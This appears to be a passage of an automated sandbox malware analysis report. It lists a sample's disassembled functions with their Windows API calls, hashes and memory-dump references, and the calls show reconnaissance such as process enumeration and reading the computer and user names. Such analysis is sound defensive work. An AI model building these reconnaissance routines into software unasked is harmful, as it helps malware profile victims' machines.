                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                                  Function 00411ED0 Relevance: 7.5, APIs: 5, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                                  • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                                  Function 00406FE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                                  • String ID: \LOCK
                                                                                                                                                                                                                                                                                                  • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                                  • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                                  Function 004108E0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                                  • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                                  Function 004108B0 Relevance: 4.5, APIs: 3, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                                  • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                                                  Function 00410BA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                                                  Function 0040D080 Relevance: 149.5, APIs: 82, Strings: 3, Instructions: 788memorystringregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D457
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,77355E70), ref: 0040D461
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D47B
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D5C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D5E9
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D60A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
